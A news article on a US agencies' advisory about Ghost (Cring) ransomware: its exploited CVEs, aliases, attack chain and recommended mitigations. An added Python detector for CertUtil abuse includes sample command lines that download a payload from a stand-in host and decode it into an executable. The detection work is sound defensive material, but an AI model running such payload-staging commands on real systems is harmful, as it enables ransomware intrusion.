
US cybersecurity agencies have issued a warning about the Ghost ransomware group, also known as Cring, following investigations into its global impact. The Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) have published an advisory detailing the ransomware’s tactics, techniques, and indicators of compromise (IOCs). The report highlights the group’s ability to exploit vulnerabilities in outdated software and firmware, leading to widespread disruptions across multiple sectors.
Since early 2021, Ghost ransomware actors have been breaching systems by targeting known security flaws that remain unpatched. The advisory states that more than 70 countries have been affected, including China. The group’s activities have compromised critical infrastructure, government networks, educational institutions, healthcare providers, technology firms, manufacturing companies, and small- to medium-sized businesses. The ransomware has been linked to operations originating in China, with attacks carried out for financial gain.
The advisory identifies vulnerabilities in internet-facing services as the primary entry point for Ghost ransomware. The group takes advantage of unpatched flaws in widely used systems, including Fortinet SSL VPN (CVE-2018-13379), ColdFusion (CVE-2010-2861, CVE-2009-3960), and Microsoft Exchange (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207). Despite multiple warnings from cybersecurity firms, these vulnerabilities continue to be targeted, often due to delayed security updates or misconfigured systems.
The ransomware group frequently alters its attack methods, making attribution challenging. Operators rotate their malware executables, modify ransom notes, change encrypted file extensions, and use multiple email addresses for ransom communications. Over time, the group has been identified under various names, including Crypt3r, Phantom, Strike, Hello, Wickrme, HsHarada, and Rapture. Among the ransomware variants associated with Ghost attacks are Cring.exe, Ghost.exe, ElysiumO.exe, and Locker.exe.
Tactics used in attacks and cybersecurity recommendations
Investigations into Ghost ransomware activity have revealed a pattern of attack that begins with credential theft, followed by the deployment of malicious tools to maintain access. Researchers first observed the ransomware when attackers were found using Mimikatz to extract credentials before deploying Cobalt Strike beacons for persistence. The ransomware payloads were then executed using Windows CertUtil, a legitimate certificate management tool, allowing attackers to bypass security detection mechanisms. The same vulnerabilities exploited by Ghost ransomware actors have also been used by state-backed hacking groups. Fortinet has repeatedly urged organisations to patch the SSL VPN flaw (CVE-2018-13379), issuing multiple advisories between 2019 and 2021.
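As an added defender-side example (not code from the advisory or this article), the following Python flags process-creation events in which CertUtil is invoked with the download or decode switches that let it stage a payload, matching the CertUtil step in the attack pattern above. The simplified event shape, the sample records, and the choice of the IIS worker process (w3wp.exe) as a high-risk parent are assumptions made for the example.

```python
"""Constructed example: detect CertUtil payload staging in process-creation logs.
Event fields loosely follow Sysmon Event ID 1; the sample records are made up."""

# Real certutil.exe switches that repurpose it as a downloader or decoder.
CERTUTIL_ABUSE_SWITCHES = {"-urlcache", "-decode", "-decodehex", "-encode"}

# Assumption: an IIS worker (which fronts Exchange) should never spawn certutil,
# so that parent raises the severity of a hit.
WEB_WORKER_PARENTS = {"w3wp.exe"}

SAMPLE_EVENTS = [  # constructed records, not real telemetry
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -URLCache -split -f http://198.51.100.7/x.txt C:\Users\Public\x.txt",
     "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil -decode C:\Users\Public\x.txt C:\Users\Public\x.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil -verify -urlfetch C:\certs\server.cer",  # legitimate use
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe notes.txt",
     "ParentImage": r"C:\Windows\explorer.exe"},
]

def basename(path):
    """Last path component, lower-cased, for case-insensitive image matching."""
    return path.rsplit("\\", 1)[-1].lower()

def switches(cmdline):
    """Lower-cased switches in a command line; '/x' is normalised to '-x'."""
    return {("-" + t[1:]).lower() if t.startswith("/") else t.lower()
            for t in cmdline.split() if t[:1] in ("-", "/")}

def classify(event):
    """None for benign events; 'medium' for certutil abuse; 'high' if a web worker spawned it."""
    if basename(event["Image"]) != "certutil.exe":
        return None
    if not switches(event["CommandLine"]) & CERTUTIL_ABUSE_SWITCHES:
        return None
    if basename(event["ParentImage"]) in WEB_WORKER_PARENTS:
        return "high"
    return "medium"

def scan(events):
    """Return (severity, command line) for every event that classify() flags."""
    return [(classify(e), e["CommandLine"]) for e in events if classify(e)]

if __name__ == "__main__":
    for severity, cmd in scan(SAMPLE_EVENTS):
        print(f"[{severity}] {cmd}")
```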
In response to the ongoing threat, CISA, the FBI, and MS-ISAC have outlined mitigation measures. The advisory recommends that organisations implement regular system backups stored separately from primary networks to prevent attackers from encrypting critical data. Keeping software and firmware up to date is also advised, as unpatched systems remain the primary attack vector. Additionally, network segmentation is suggested to limit lateral movement within compromised environments and contain the impact of an attack. Further recommendations include enabling phishing-resistant multi-factor authentication (MFA) for privileged accounts and email services to prevent unauthorised access. Cybersecurity teams are also encouraged to monitor for signs of Ghost ransomware activity using the IOCs and detection methods detailed in the advisory.